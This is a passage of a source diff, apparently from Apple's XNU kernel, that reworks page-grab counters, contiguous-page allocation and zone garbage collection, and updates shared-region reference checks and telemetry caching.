        VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, 0, 1, 0, 0);
-       enable_preemption();
 
        return mem;
 }
 
-
 /*
  *     vm_page_grab:
  *
@@ -3121,7 +3113,7 @@ return_page_from_cpu_list:
                vm_page_grab_diags();
 
                vm_offset_t pcpu_base = current_percpu_base();
-               *PERCPU_GET_WITH_BASE(pcpu_base, vm_page_grab_count) += 1;
+               counter_inc_preemption_disabled(&vm_page_grab_count);
                *PERCPU_GET_WITH_BASE(pcpu_base, free_pages) = mem->vmp_snext;
                VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0);
 
@@ -3201,11 +3193,9 @@ return_page_from_cpu_list:
                        if (mem) {
                                VM_CHECK_MEMORYSTATUS;
 
-                               disable_preemption();
                                vm_page_grab_diags();
-                               *PERCPU_GET(vm_page_grab_count) += 1;
+                               counter_inc(&vm_page_grab_count);
                                VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0);
-                               enable_preemption();
 
                                return mem;
                        }
@@ -3333,7 +3323,7 @@ return_page_from_cpu_list:
                 * satisfy this request
                 */
                vm_page_grab_diags();
-               *PERCPU_GET_WITH_BASE(pcpu_base, vm_page_grab_count) += 1;
+               counter_inc_preemption_disabled(&vm_page_grab_count);
                VM_DEBUG_EVENT(vm_page_grab, VM_PAGE_GRAB, DBG_FUNC_NONE, grab_options, 0, 0, 0);
                mem = head;
                assert(mem->vmp_q_state == VM_PAGE_ON_FREE_LOCAL_Q);
@@ -3891,8 +3881,6 @@ vm_page_wait(
                 * context switch. Could be a perf. issue.
                 */
 
-               counter(c_vm_page_wait_block++);
-
                if (need_wakeup) {
                        thread_wakeup((event_t)&vm_page_free_wanted);
                }
@@ -3921,7 +3909,6 @@ vm_page_wait(
                wait_result = assert_wait(wait_event, interruptible);
 
                lck_mtx_unlock(&vm_page_queue_free_lock);
-               counter(c_vm_page_wait_block++);
 
                if (need_wakeup) {
                        thread_wakeup((event_t)&vm_page_free_wanted);
@@ -3980,35 +3967,6 @@ vm_page_alloc(
        return mem;
 }
 
-/*
- *     vm_page_alloc_guard:
- *
- *      Allocate a fictitious page which will be used
- *     as a guard page.  The page will be inserted into
- *     the object and returned to the caller.
- */
-
-vm_page_t
-vm_page_alloc_guard(
-       vm_object_t             object,
-       vm_object_offset_t      offset)
-{
-       vm_page_t       mem;
-
-       vm_object_lock_assert_exclusive(object);
-       mem = vm_page_grab_guard();
-       if (mem == VM_PAGE_NULL) {
-               return VM_PAGE_NULL;
-       }
-
-       vm_page_insert(mem, object, offset);
-
-       return mem;
-}
-
-
-counter(unsigned int c_laundry_pages_freed = 0; )
-
 /*
  *     vm_page_free_prepare:
  *
@@ -4051,7 +4009,6 @@ vm_page_free_prepare_queues(
                 * from its pageout queue and adjust the laundry accounting
                 */
                vm_pageout_steal_laundry(mem, TRUE);
-               counter(++c_laundry_pages_freed);
        }
 
        vm_page_queues_remove(mem, TRUE);
@@ -5806,7 +5763,8 @@ vm_page_find_contiguous(
        unsigned int    idx_last_contig_page_found = 0;
        int             free_considered = 0, free_available = 0;
        int             substitute_needed = 0;
-       boolean_t       wrapped, zone_gc_called = FALSE;
+       int             zone_gc_called = 0;
+       boolean_t       wrapped;
        kern_return_t   kr;
 #if DEBUG
        clock_sec_t     tv_start_sec = 0, tv_end_sec = 0;
@@ -6445,7 +6403,7 @@ done_scanning:
 #if MACH_ASSERT
        vm_page_verify_free_lists();
 #endif
-       if (m == NULL && zone_gc_called == FALSE) {
+       if (m == NULL && zone_gc_called < 2) {
                printf("%s(num=%d,low=%d): found %d pages at 0x%llx...scanned %d pages...  yielded %d times...  dumped run %d times... stole %d pages... stole %d compressed pages... wired count is %d\n",
                    __func__, contig_pages, max_pnum, npages, (vm_object_offset_t)start_pnum << PAGE_SHIFT,
                        scanned, yielded, dumped_run, stolen_pages, compressed_pages, vm_page_wire_count);
@@ -6454,9 +6412,9 @@ done_scanning:
                        (void)(*consider_buffer_cache_collect)(1);
                }
 
-               consider_zone_gc(FALSE);
+               zone_gc(zone_gc_called ? ZONE_GC_DRAIN : ZONE_GC_TRIM);
 
-               zone_gc_called = TRUE;
+               zone_gc_called++;
 
                printf("vm_page_find_contiguous: zone_gc called... wired count is %d\n", vm_page_wire_count);
                goto full_scan_again;
@@ -6704,36 +6662,76 @@ vm_page_do_delayed_work(
 
 kern_return_t
 vm_page_alloc_list(
-       int     page_count,
-       int     flags,
-       vm_page_t *list)
+       int         page_count,
+       kma_flags_t flags,
+       vm_page_t  *list)
 {
-       vm_page_t       lo_page_list = VM_PAGE_NULL;
+       vm_page_t       page_list = VM_PAGE_NULL;
        vm_page_t       mem;
-       int             i;
+       kern_return_t   kr = KERN_SUCCESS;
+       int             page_grab_count = 0;
+       mach_vm_size_t  map_size = ptoa_64(page_count);
+#if DEVELOPMENT || DEBUG
+       task_t          task = current_task();
+#endif /* DEVELOPMENT || DEBUG */
 
-       if (!(flags & KMA_LOMEM)) {
-               panic("vm_page_alloc_list: called w/o KMA_LOMEM");
-       }
+       for (int i = 0; i < page_count; i++) {
+               for (;;) {
+                       if (flags & KMA_LOMEM) {
+                               mem = vm_page_grablo();
+                       } else {
+                               mem = vm_page_grab();
+                       }
 
-       for (i = 0; i < page_count; i++) {
-               mem = vm_page_grablo();
+                       if (mem != VM_PAGE_NULL) {
+                               break;
+                       }
 
-               if (mem == VM_PAGE_NULL) {
-                       if (lo_page_list) {
-                               vm_page_free_list(lo_page_list, FALSE);
+                       if (flags & KMA_NOPAGEWAIT) {
+                               kr = KERN_RESOURCE_SHORTAGE;
+                               goto out;
+                       }
+                       if ((flags & KMA_LOMEM) && (vm_lopage_needed == TRUE)) {
+                               kr = KERN_RESOURCE_SHORTAGE;
+                               goto out;
                        }
 
-                       *list = VM_PAGE_NULL;
+                       /* VM privileged threads should have waited in vm_page_grab() and not get here. */
+                       assert(!(current_thread()->options & TH_OPT_VMPRIV));
 
-                       return KERN_RESOURCE_SHORTAGE;
+                       uint64_t unavailable = (vm_page_wire_count + vm_page_free_target) * PAGE_SIZE;
+                       if (unavailable > max_mem || map_size > (max_mem - unavailable)) {
+                               kr = KERN_RESOURCE_SHORTAGE;
+                               goto out;
+                       }
+                       VM_PAGE_WAIT();
                }
-               mem->vmp_snext = lo_page_list;
-               lo_page_list = mem;
+
+               page_grab_count++;
+               mem->vmp_snext = page_list;
+               page_list = mem;
        }
-       *list = lo_page_list;
 
-       return KERN_SUCCESS;
+       if (KMA_ZERO & flags) {
+               for (mem = page_list; mem; mem = mem->vmp_snext) {
+                       vm_page_zero_fill(mem);
+               }
+       }
+
+out:
+#if DEBUG || DEVELOPMENT
+       if (task != NULL) {
+               ledger_credit(task->ledger, task_ledgers.pages_grabbed_kern, page_grab_count);
+       }
+#endif
+
+       if (kr == KERN_SUCCESS) {
+               *list = page_list;
+       } else {
+               vm_page_free_list(page_list, FALSE);
+       }
+
+       return kr;
 }
 
 void
@@ -7200,7 +7198,7 @@ hibernate_flush_memory()
                        orig_wire_count = vm_page_wire_count;
 
                        (void)(*consider_buffer_cache_collect)(1);
-                       consider_zone_gc(FALSE);
+                       zone_gc(ZONE_GC_DRAIN);
 
                        HIBLOG("hibernate_flush_memory: buffer_cache_gc freed up %d wired pages\n", orig_wire_count - vm_page_wire_count);
 
@@ -9150,36 +9148,45 @@ vm_allocation_zones_init(void)
        vm_allocation_zone_totals[VM_KERN_MEMORY_KALLOC] = (vm_allocation_zone_total_t *) addr;
 }
 
-void
-vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx)
+__attribute__((noinline))
+static vm_tag_t
+vm_tag_zone_stats_alloc(vm_tag_t tag, zalloc_flags_t flags)
 {
-       vm_allocation_zone_total_t * zone;
+       vm_allocation_zone_total_t *stats;
+       vm_size_t size = sizeof(*stats) * VM_MAX_TAG_ZONES;
 
+       stats = kheap_alloc(KHEAP_DATA_BUFFERS, size,
+           Z_VM_TAG(VM_KERN_MEMORY_DIAG) | Z_ZERO | flags);
+       if (!stats) {
+               return VM_KERN_MEMORY_NONE;
+       }
+       if (!os_atomic_cmpxchg(&vm_allocation_zone_totals[tag], NULL, stats, release)) {
+               kheap_free(KHEAP_DATA_BUFFERS, stats, size);
+       }
+       return tag;
+}
+
+vm_tag_t
+vm_tag_will_update_zone(vm_tag_t tag, uint32_t zidx, uint32_t zflags)
+{
        assert(VM_KERN_MEMORY_NONE != tag);
        assert(tag < VM_MAX_TAG_VALUE);
 
        if (zidx >= VM_MAX_TAG_ZONES) {
-               return;
+               return VM_KERN_MEMORY_NONE;
        }
 
-       zone = vm_allocation_zone_totals[tag];
-       if (!zone) {
-               zone = kalloc_tag(VM_MAX_TAG_ZONES * sizeof(*zone), VM_KERN_MEMORY_DIAG);
-               if (!zone) {
-                       return;
-               }
-               bzero(zone, VM_MAX_TAG_ZONES * sizeof(*zone));
-               if (!OSCompareAndSwapPtr(NULL, zone, &vm_allocation_zone_totals[tag])) {
-                       kfree(zone, VM_MAX_TAG_ZONES * sizeof(*zone));
-               }
+       if (__probable(vm_allocation_zone_totals[tag])) {
+               return tag;
        }
+       return vm_tag_zone_stats_alloc(tag, zflags);
 }
 
 void
-vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwaste)
+vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, long delta)
 {
-       vm_allocation_zone_total_t * zone;
-       uint32_t new;
+       vm_allocation_zone_total_t *stats;
+       vm_size_t value;
 
        assert(VM_KERN_MEMORY_NONE != tag);
        assert(tag < VM_MAX_TAG_VALUE);
@@ -9188,30 +9195,16 @@ vm_tag_update_zone_size(vm_tag_t tag, uint32_t zidx, int64_t delta, int64_t dwas
                return;
        }
 
-       zone = vm_allocation_zone_totals[tag];
-       assert(zone);
-       zone += zidx;
+       stats = vm_allocation_zone_totals[tag];
+       assert(stats);
+       stats += zidx;
 
-       /* the zone is locked */
+       value = os_atomic_add(&stats->vazt_total, delta, relaxed);
        if (delta < 0) {
-               assertf(zone->total >= ((uint64_t)-delta), "zidx %d, tag %d, %p", zidx, tag, zone);
-               zone->total += delta;
-       } else {
-               zone->total += delta;
-               if (zone->total > zone->peak) {
-                       zone->peak = zone->total;
-               }
-               if (dwaste) {
-                       new = zone->waste;
-                       if (zone->wastediv < 65536) {
-                               zone->wastediv++;
-                       } else {
-                               new -= (new >> 16);
-                       }
-                       __assert_only bool ov = os_add_overflow(new, dwaste, &new);
-                       assert(!ov);
-                       zone->waste = new;
-               }
+               assertf((long)value >= 0, "zidx %d, tag %d, %p", zidx, tag, stats);
+               return;
+       } else if (os_atomic_load(&stats->vazt_peak, relaxed) < value) {
+               os_atomic_max(&stats->vazt_peak, value, relaxed);
        }
 }
 
@@ -9416,19 +9409,16 @@ process_account(mach_memory_info_t * info, unsigned int num_info,
                    && (zone = vm_allocation_zone_totals[idx])
                    && (nextinfo < num_info)) {
                        for (zidx = 0; zidx < VM_MAX_TAG_ZONES; zidx++) {
-                               if (!zone[zidx].peak) {
+                               if (!zone[zidx].vazt_peak) {
                                        continue;
                                }
                                info[nextinfo]        = info[idx];
                                info[nextinfo].zone   = (uint16_t)zone_index_from_tag_index(zidx, &elem_size);
                                info[nextinfo].flags  &= ~VM_KERN_SITE_WIRED;
                                info[nextinfo].flags  |= VM_KERN_SITE_ZONE;
-                               info[nextinfo].size   = zone[zidx].total;
-                               info[nextinfo].peak   = zone[zidx].peak;
+                               info[nextinfo].size   = zone[zidx].vazt_total;
+                               info[nextinfo].peak   = zone[zidx].vazt_peak;
                                info[nextinfo].mapped = 0;
-                               if (zone[zidx].wastediv) {
-                                       info[nextinfo].collectable_bytes = ((zone[zidx].waste * zone[zidx].total / elem_size) / zone[zidx].wastediv);
-                               }
                                nextinfo++;
                        }
                }
@@ -9490,9 +9480,7 @@ vm_page_diagnose_estimate(void)
                                continue;
                        }
                        for (uint32_t zidx = 0; zidx < VM_MAX_TAG_ZONES; zidx++) {
-                               if (zone[zidx].peak) {
-                                       count++;
-                               }
+                               count += (zone[zidx].vazt_peak != 0);
                        }
                }
 #endif
@@ -9522,7 +9510,7 @@ vm_page_diagnose_zone_stats(mach_memory_info_t *info, zone_stats_t zstats,
 static void
 vm_page_diagnose_zone(mach_memory_info_t *info, zone_t z)
 {
-       vm_page_diagnose_zone_stats(info, z->z_stats, z->percpu);
+       vm_page_diagnose_zone_stats(info, z->z_stats, z->z_percpu);
        snprintf(info->name, sizeof(info->name),
            "%s%s[raw]", zone_heap_name(z), z->z_name);
 }
@@ -9562,13 +9550,13 @@ vm_page_diagnose(mach_memory_info_t * info, unsigned int num_info, uint64_t zone
                return KERN_ABORTED;
        }
 
-#if CONFIG_EMBEDDED
+#if !XNU_TARGET_OS_OSX
        wired_size          = ptoa_64(vm_page_wire_count);
        wired_reserved_size = ptoa_64(vm_page_wire_count_initial - vm_page_stolen_count);
-#else
+#else /* !XNU_TARGET_OS_OSX */
        wired_size          = ptoa_64(vm_page_wire_count + vm_lopage_free_count + vm_page_throttled_count);
        wired_reserved_size = ptoa_64(vm_page_wire_count_initial - vm_page_stolen_count + vm_page_throttled_count);
-#endif
+#endif /* !XNU_TARGET_OS_OSX */
        wired_managed_size  = ptoa_64(vm_page_wire_count - vm_page_wire_count_initial);
 
        wired_size += booter_size;
@@ -9643,7 +9631,7 @@ vm_page_diagnose(mach_memory_info_t * info, unsigned int num_info, uint64_t zone
 
                for (; zv; zv = zv->zv_next) {
                        vm_page_diagnose_zone_stats(counts + i, zv->zv_stats,
-                           z->percpu);
+                           z->z_percpu);
                        snprintf(counts[i].name, sizeof(counts[i].name), "%s%s[%s]",
                            zone_heap_name(z), z->z_name, zv->zv_name);
                        i++;
@@ -9827,3 +9815,39 @@ stop_secluded_suppression(task_t task)
 }
 
 #endif /* CONFIG_SECLUDED_MEMORY */
+
+/*
+ * Move the list of retired pages on the vm_page_queue_retired to
+ * their final resting place on retired_pages_object.
+ */
+void
+vm_retire_boot_pages(void)
+{
+#if defined(__arm64__)
+       vm_page_t p;
+
+       vm_object_lock(retired_pages_object);
+       while (!vm_page_queue_empty(&vm_page_queue_retired)) {
+               vm_page_queue_remove_first(&vm_page_queue_retired, p, vmp_pageq);
+               assert(p != NULL);
+               vm_page_lock_queues();
+               p->vmp_q_state = VM_PAGE_IS_WIRED;
+               p->vmp_wire_count++;
+               vm_page_unlock_queues();
+               vm_page_insert_wired(p, retired_pages_object, ptoa(VM_PAGE_GET_PHYS_PAGE(p)), VM_KERN_MEMORY_RETIRED);
+               vm_object_unlock(retired_pages_object);
+               pmap_retire_page(VM_PAGE_GET_PHYS_PAGE(p));
+               vm_object_lock(retired_pages_object);
+       }
+       vm_object_unlock(retired_pages_object);
+#endif /* defined(__arm64__) */
+}
+
+/*
+ * Returns the current number of retired pages, used for sysctl.
+ */
+uint32_t
+vm_retired_pages_count(void)
+{
+       return retired_pages_object->resident_page_count;
+}
index 115b247130e6ac0e9d2db7ac75764585068d60f8..fb594cd869121b19f3cda9d3e6b358ed040182c7 100644 (file)
@@ -143,16 +143,23 @@ int shared_region_persistence = 0;      /* no by default */
 /* delay in seconds before reclaiming an unused shared region */
 TUNABLE_WRITEABLE(int, shared_region_destroy_delay, "vm_shared_region_destroy_delay", 120);
 
-struct vm_shared_region *init_task_shared_region = NULL;
+/*
+ * Cached pointer to the most recently mapped shared region from PID 1, which should
+ * be the most commonly mapped shared region in the system.  There are many processes
+ * which do not use this, for a variety of reasons.
+ *
+ * The main consumer of this is stackshot.
+ */
+struct vm_shared_region *primary_system_shared_region = NULL;
 
-#ifndef CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 /*
  * Only one cache gets to slide on Desktop, since we can't
  * tear down slide info properly today and the desktop actually
  * produces lots of shared caches.
  */
 boolean_t shared_region_completed_slide = FALSE;
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 /* this lock protects all the shared region data structures */
 static LCK_GRP_DECLARE(vm_shared_region_lck_grp, "vm shared region");
@@ -203,10 +210,10 @@ static kern_return_t vm_shared_region_slide_mapping(
        vm_prot_t          prot); /* forward */
 
 static int __commpage_setup = 0;
-#if !CONFIG_EMBEDDED
+#if XNU_TARGET_OS_OSX
 static int __system_power_source = 1;   /* init to extrnal power source */
 static void post_sys_powersource_internal(int i, int internal);
-#endif
+#endif /* XNU_TARGET_OS_OSX */
 
 extern u_int32_t random(void);
 
@@ -244,75 +251,6 @@ vm_shared_region_get(
        return shared_region;
 }
 
-/*
- * Get the base address of the shared region.
- * That's the address at which it needs to be mapped in the process's address
- * space.
- * No need to lock since this data is set when the shared region is
- * created and is never modified after that.  The caller must hold an extra
- * reference on the shared region to prevent it from being destroyed.
- */
-mach_vm_offset_t
-vm_shared_region_base_address(
-       vm_shared_region_t      shared_region)
-{
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: -> base_address(%p)\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: base_address(%p) <- 0x%llx\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region),
-               (long long)shared_region->sr_base_address));
-       return shared_region->sr_base_address;
-}
-
-/*
- * Get the size of the shared region.
- * That's the size that needs to be mapped in the process's address
- * space.
- * No need to lock since this data is set when the shared region is
- * created and is never modified after that.  The caller must hold an extra
- * reference on the shared region to prevent it from being destroyed.
- */
-mach_vm_size_t
-vm_shared_region_size(
-       vm_shared_region_t      shared_region)
-{
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: -> size(%p)\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: size(%p) <- 0x%llx\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region),
-               (long long)shared_region->sr_size));
-       return shared_region->sr_size;
-}
-
-/*
- * Get the memory entry of the shared region.
- * That's the "memory object" that needs to be mapped in the process's address
- * space.
- * No need to lock since this data is set when the shared region is
- * created and is never modified after that.  The caller must hold an extra
- * reference on the shared region to prevent it from being destroyed.
- */
-ipc_port_t
-vm_shared_region_mem_entry(
-       vm_shared_region_t      shared_region)
-{
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: -> mem_entry(%p)\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
-       SHARED_REGION_TRACE_DEBUG(
-               ("shared_region: mem_entry(%p) <- %p\n",
-               (void *)VM_KERNEL_ADDRPERM(shared_region),
-               (void *)VM_KERNEL_ADDRPERM(shared_region->sr_mem_entry)));
-       return shared_region->sr_mem_entry;
-}
-
 vm_map_t
 vm_shared_region_vm_map(
        vm_shared_region_t      shared_region)
@@ -324,7 +262,7 @@ vm_shared_region_vm_map(
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: -> vm_map(%p)\n",
                (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
 
        sr_handle = shared_region->sr_mem_entry;
        sr_mem_entry = (vm_named_entry_t) ip_get_kobject(sr_handle);
@@ -619,6 +557,11 @@ vm_shared_region_deallocate(
                } else {
                        /* timer expired: let go of this shared region */
 
+                       /* Make sure there's no cached pointer to the region. */
+                       if (primary_system_shared_region == shared_region) {
+                               primary_system_shared_region = NULL;
+                       }
+
                        /*
                         * Remove it from the queue first, so no one can find
                         * it...
@@ -977,11 +920,13 @@ vm_shared_region_destroy(
 
 /*
  * Gets the address of the first (in time) mapping in the shared region.
+ * If used during initial task setup by dyld, task should non-NULL.
  */
 kern_return_t
 vm_shared_region_start_address(
        vm_shared_region_t      shared_region,
-       mach_vm_offset_t        *start_address)
+       mach_vm_offset_t        *start_address,
+       task_t                  task)
 {
        kern_return_t           kr;
        mach_vm_offset_t        sr_base_address;
@@ -990,7 +935,6 @@ vm_shared_region_start_address(
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: -> start_address(%p)\n",
                (void *)VM_KERNEL_ADDRPERM(shared_region)));
-       assert(shared_region->sr_ref_count > 1);
 
        vm_shared_region_lock();
 
@@ -1001,12 +945,11 @@ vm_shared_region_start_address(
         */
        while (shared_region->sr_mapping_in_progress) {
                /* wait for our turn... */
-               assert(shared_region->sr_ref_count > 1);
                vm_shared_region_sleep(&shared_region->sr_mapping_in_progress,
                    THREAD_UNINT);
        }
        assert(!shared_region->sr_mapping_in_progress);
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
 
        sr_base_address = shared_region->sr_base_address;
        sr_first_mapping = shared_region->sr_first_mapping;
@@ -1020,8 +963,23 @@ vm_shared_region_start_address(
        }
 
 
+       uint32_t slide = shared_region->sr_slide;
+
        vm_shared_region_unlock();
 
+       /*
+        * Cache shared region info in the task for telemetry gathering, if we're
+        * passed in the task. No task lock here as we're still in intial task set up.
+        */
+       if (kr == KERN_SUCCESS && task != NULL && task->task_shared_region_slide == -1) {
+               uint_t sc_header_uuid_offset = offsetof(struct _dyld_cache_header, uuid);
+               if (copyin((user_addr_t)(*start_address + sc_header_uuid_offset),
+                   (char *)&task->task_shared_region_uuid,
+                   sizeof(task->task_shared_region_uuid)) == 0) {
+                       task->task_shared_region_slide = slide;
+               }
+       }
+
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: start_address(%p) <- 0x%llx\n",
                (void *)VM_KERNEL_ADDRPERM(shared_region),
@@ -1105,7 +1063,7 @@ vm_shared_region_auth_remap(vm_shared_region_t sr)
                vm_shared_region_sleep(&sr->sr_mapping_in_progress, THREAD_UNINT);
        }
        assert(!sr->sr_mapping_in_progress);
-       assert(sr->sr_ref_count > 1);
+       assert(sr->sr_ref_count > 0);
 
        /* Just return if already done. */
        if (task->shared_region_auth_remapped) {
@@ -1157,8 +1115,7 @@ vm_shared_region_auth_remap(vm_shared_region_t sr)
                /*
                 * Check that the object exactly covers the region to slide.
                 */
-               if (VME_OFFSET(tmp_entry) != si->si_start ||
-                   tmp_entry->vme_end - tmp_entry->vme_start != si->si_end - si->si_start) {
+               if (tmp_entry->vme_end - tmp_entry->vme_start != si->si_end - si->si_start) {
                        kr = KERN_FAILURE;
                        goto done;
                }
@@ -1251,7 +1208,7 @@ vm_shared_region_undo_mappings(
                vm_named_entry_t        sr_mem_entry;
 
                vm_shared_region_lock();
-               assert(shared_region->sr_ref_count > 1);
+               assert(shared_region->sr_ref_count > 0);
 
                while (shared_region->sr_mapping_in_progress) {
                        /* wait for our turn... */
@@ -1259,7 +1216,7 @@ vm_shared_region_undo_mappings(
                            THREAD_UNINT);
                }
                assert(!shared_region->sr_mapping_in_progress);
-               assert(shared_region->sr_ref_count > 1);
+               assert(shared_region->sr_ref_count > 0);
                /* let others know we're working in this shared region */
                shared_region->sr_mapping_in_progress = TRUE;
 
@@ -1319,7 +1276,7 @@ vm_shared_region_undo_mappings(
 
        if (reset_shared_region_state) {
                vm_shared_region_lock();
-               assert(shared_region->sr_ref_count > 1);
+               assert(shared_region->sr_ref_count > 0);
                assert(shared_region->sr_mapping_in_progress);
                /* we're done working on that shared region */
                shared_region->sr_mapping_in_progress = FALSE;
@@ -1332,10 +1289,11 @@ vm_shared_region_undo_mappings(
 }
 
 /*
- * For now we only expect to see at most 2 regions to relocate/authenticate
- * per file. One that's VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH.
+ * For now we only expect to see at most 4 regions to relocate/authenticate
+ * per file. One that's RW VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH.
+ * And then RO VM_PROT_SLIDE and one VM_PROT_SLIDE | VM_PROT_NOAUTH.
  */
-#define VMSR_NUM_SLIDES 2
+#define VMSR_NUM_SLIDES 4
 
 /*
  * First part of vm_shared_region_map_file(). Split out to
@@ -1379,7 +1337,7 @@ vm_shared_region_map_file_setup(
        unsigned int            current_file_index = 0;
 
        vm_shared_region_lock();
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
 
        /*
         * Make sure we handle only one mapping at a time in a given
@@ -1392,7 +1350,7 @@ vm_shared_region_map_file_setup(
                    THREAD_UNINT);
        }
        assert(!shared_region->sr_mapping_in_progress);
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
        /* let others know we're working in this shared region */
        shared_region->sr_mapping_in_progress = TRUE;
 
@@ -1726,7 +1684,10 @@ vm_shared_region_map_file(
        mach_vm_offset_t        sfm_max_address = 0;
        vm_map_t                sr_map = NULL;
        vm_map_offset_t         lowest_unnestable_addr = 0;
-       mach_vm_offset_t        file_first_mappings[VMSR_NUM_SLIDES] = {(mach_vm_offset_t) -1, (mach_vm_offset_t) -1};
+       mach_vm_offset_t        file_first_mappings[VMSR_NUM_SLIDES];
+       for (i = 0; i < VMSR_NUM_SLIDES; ++i) {
+               file_first_mappings[i] = (mach_vm_offset_t) -1;
+       }
 
        kr = vm_shared_region_map_file_setup(shared_region, sr_file_mappings_count, sr_file_mappings,
            &mappings_to_slide_cnt, &mappings_to_slide[0], slid_mappings, slid_file_controls,
@@ -1776,7 +1737,7 @@ vm_shared_region_map_file(
        }
 
        vm_shared_region_lock();
-       assert(shared_region->sr_ref_count > 1);
+       assert(shared_region->sr_ref_count > 0);
        assert(shared_region->sr_mapping_in_progress);
 
        /* set "sr_first_mapping"; dyld uses it to validate the shared cache */
@@ -1806,6 +1767,13 @@ done:
        }
 #endif /* __has_feature(ptrauth_calls) */
 
+       /* Cache shared region info needed for telemetry in the task */
+       task_t task;
+       if (kr == KERN_SUCCESS && (task = current_task())->task_shared_region_slide == -1) {
+               mach_vm_offset_t start_address;
+               (void)vm_shared_region_start_address(shared_region, &start_address, task);
+       }
+
        SHARED_REGION_TRACE_DEBUG(
                ("shared_region: map(%p) <- 0x%x \n",
                (void *)VM_KERNEL_ADDRPERM(shared_region), kr));
@@ -1829,6 +1797,7 @@ vm_shared_region_map_file_final(
        int                       error;
        size_t                    image_array_length;
        struct _dyld_cache_image_text_info *sr_image_layout;
+       boolean_t                 locally_built = FALSE;
 
 
        /*
@@ -1844,6 +1813,7 @@ vm_shared_region_map_file_final(
                if (error == 0) {
                        memcpy(&shared_region->sr_uuid, &sr_cache_header.uuid, sizeof(shared_region->sr_uuid));
                        shared_region->sr_uuid_copied = TRUE;
+                       locally_built = sr_cache_header.locallyBuiltCache;
                } else {
 #if DEVELOPMENT || DEBUG
                        panic("shared_region: copyin shared_cache_header(sr_base_addr:0x%016llx sr_first_mapping:0x%016llx "
@@ -1858,19 +1828,27 @@ vm_shared_region_map_file_final(
        }
 
        /*
-        * If the shared cache is associated with the init task (and is therefore the system shared cache),
-        * check whether it is a custom built shared cache and copy in the shared cache layout accordingly.
+        * We save a pointer to the shared cache mapped by the "init task", i.e. launchd.  This is used by
+        * the stackshot code to reduce output size in the common case that everything maps the same shared cache.
+        * One gotcha is that "userspace reboots" can occur which can cause a new shared region to be the primary
+        * region.  In that case, launchd re-exec's itself, so we may go through this path multiple times.  We
+        * let the most recent one win.
+        *
+        * Check whether the shared cache is a custom built one and copy in the shared cache layout accordingly.
         */
-       boolean_t is_init_task = (task_pid(current_task()) == 1);
+       bool is_init_task = (task_pid(current_task()) == 1);
        if (shared_region->sr_uuid_copied && is_init_task) {
                /* Copy in the shared cache layout if we're running with a locally built shared cache */
-               if (sr_cache_header.locallyBuiltCache) {
+               if (locally_built) {
                        KDBG((MACHDBG_CODE(DBG_MACH_SHAREDREGION, PROCESS_SHARED_CACHE_LAYOUT)) | DBG_FUNC_START);
                        image_array_length = (size_t)(sr_cache_header.imagesTextCount * sizeof(struct _dyld_cache_image_text_info));
                        sr_image_layout = kheap_alloc(KHEAP_DATA_BUFFERS, image_array_length, Z_WAITOK);
                        error = copyin((user_addr_t)(shared_region->sr_base_address + shared_region->sr_first_mapping +
                            sr_cache_header.imagesTextOffset), (char *)sr_image_layout, image_array_length);
                        if (error == 0) {
+                               if (sr_cache_header.imagesTextCount >= UINT32_MAX) {
+                                       panic("shared_region: sr_cache_header.imagesTextCount >= UINT32_MAX");
+                               }
                                shared_region->sr_images = kalloc((vm_size_t)(sr_cache_header.imagesTextCount * sizeof(struct dyld_uuid_info_64)));
                                for (size_t index = 0; index < sr_cache_header.imagesTextCount; index++) {
                                        memcpy((char *)&shared_region->sr_images[index].imageUUID, (char *)&sr_image_layout[index].uuid,
@@ -1878,7 +1856,6 @@ vm_shared_region_map_file_final(
                                        shared_region->sr_images[index].imageLoadAddress = sr_image_layout[index].loadAddress;
                                }
 
-                               assert(sr_cache_header.imagesTextCount < UINT32_MAX);
                                shared_region->sr_images_count = (uint32_t) sr_cache_header.imagesTextCount;
                        } else {
 #if DEVELOPMENT || DEBUG
@@ -1895,7 +1872,7 @@ vm_shared_region_map_file_final(
                        kheap_free(KHEAP_DATA_BUFFERS, sr_image_layout, image_array_length);
                        sr_image_layout = NULL;
                }
-               init_task_shared_region = shared_region;
+               primary_system_shared_region = shared_region;
        }
 
        /*
@@ -2984,22 +2961,22 @@ vm_shared_region_slide_page(
 /* Comm page support                                                          */
 /******************************************************************************/
 
-ipc_port_t commpage32_handle = IPC_PORT_NULL;
-ipc_port_t commpage64_handle = IPC_PORT_NULL;
-vm_named_entry_t commpage32_entry = NULL;
-vm_named_entry_t commpage64_entry = NULL;
-vm_map_t commpage32_map = VM_MAP_NULL;
-vm_map_t commpage64_map = VM_MAP_NULL;
